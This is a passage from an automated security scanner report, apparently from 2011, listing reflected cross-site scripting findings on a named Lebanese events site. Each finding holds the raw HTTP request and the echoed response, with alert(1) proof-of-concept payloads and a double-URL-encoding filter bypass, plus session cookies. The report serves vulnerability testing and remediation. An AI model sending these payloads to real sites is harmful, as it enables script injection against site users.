Host:   http://www.beirut.com
Path:   /ThingsToDo/Screenings/60463877

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74443"><a>9243be17b5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo74443"><a>9243be17b5c/Screenings/60463877 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:50:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=ThingsToDo74443"><a>9243be17b5c/Screenings&listingtype=events.php&Types=">
...[SNIP]...

4.1138. http://www.beirut.com/ThingsToDo/Screenings/60463877 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Screenings/60463877

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d06f"><a>112cde1d17c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Screenings6d06f"><a>112cde1d17c/60463877 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:05:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=ThingsToDo/Screenings6d06f"><a>112cde1d17c&listingtype=events.php&Types=13">
...[SNIP]...

4.1139. http://www.beirut.com/ThingsToDo/Screenings/60463877 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Screenings/60463877

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88e46'-alert(1)-'4ce8cdfba1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo/Screenings88e46'-alert(1)-'4ce8cdfba1f/60463877 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:15:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='ThingsToDo/Screenings88e46'-alert(1)-'4ce8cdfba1f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1140. http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Seminars-and-Lectures/295390016

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13dfc"><a>750efc004b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo13dfc"><a>750efc004b1/Seminars-and-Lectures/295390016 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:44:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=ThingsToDo13dfc"><a>750efc004b1/Seminars-and-Lectures&listingtype=events.php&Types=">
...[SNIP]...

4.1141. http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Seminars-and-Lectures/295390016

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee8d4'-alert(1)-'45bcf7453a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDoee8d4'-alert(1)-'45bcf7453a2/Seminars-and-Lectures/295390016 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:55:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='ThingsToDoee8d4'-alert(1)-'45bcf7453a2/Seminars-and-Lectures';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1142. http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Seminars-and-Lectures/295390016

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33a94"><a>3d75e362c72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Seminars-and-Lectures33a94"><a>3d75e362c72/295390016 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:05:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=ThingsToDo/Seminars-and-Lectures33a94"><a>3d75e362c72&listingtype=events.php&Types=9,12">
...[SNIP]...

4.1143. http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Seminars-and-Lectures/295390016

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87a59'-alert(1)-'78cfba14f3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo/Seminars-and-Lectures87a59'-alert(1)-'78cfba14f3d/295390016 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:18:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='ThingsToDo/Seminars-and-Lectures87a59'-alert(1)-'78cfba14f3d';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1144. http://www.beirut.com/ThingsToDo/Theater/706796009 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Theater/706796009

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dacf"><a>76f239c64cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo5dacf"><a>76f239c64cc/Theater/706796009 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:56:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=ThingsToDo5dacf"><a>76f239c64cc/Theater&listingtype=events.php&Types=">
...[SNIP]...

4.1145. http://www.beirut.com/ThingsToDo/Theater/706796009 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Theater/706796009

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4b73'-alert(1)-'5f34dcd1202 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDob4b73'-alert(1)-'5f34dcd1202/Theater/706796009 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:03:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='ThingsToDob4b73'-alert(1)-'5f34dcd1202/Theater';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1146. http://www.beirut.com/ThingsToDo/Theater/706796009 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Theater/706796009

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4963d"><a>0ce246b6095 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Theater4963d"><a>0ce246b6095/706796009 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:08:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=ThingsToDo/Theater4963d"><a>0ce246b6095&listingtype=events.php&Types=7">
...[SNIP]...

4.1147. http://www.beirut.com/ThingsToDo/Theater/706796009 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Theater/706796009

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9dc4b'-alert(1)-'c46cc983fae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo/Theater9dc4b'-alert(1)-'c46cc983fae/706796009 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:21:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='ThingsToDo/Theater9dc4b'-alert(1)-'c46cc983fae';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1148. http://www.beirut.com/ThingsToDo/ThisWeek [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/ThisWeek

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34d0fc46928 was submitted in the REST URL parameter 2. This input was echoed as bef5d"><script>alert(1)</script>34d0fc46928 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/ThisWeekbef5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34d0fc46928 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:49:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="calsearchdate" id="calsearchdate" value="thisweekbef5d"><script>alert(1)</script>34d0fc46928">
...[SNIP]...

4.1149. http://www.beirut.com/ThingsToDo/Today [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Today

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01c41aa6c91 was submitted in the REST URL parameter 2. This input was echoed as 31d57"><script>alert(1)</script>01c41aa6c91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Today31d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01c41aa6c91 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:46:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
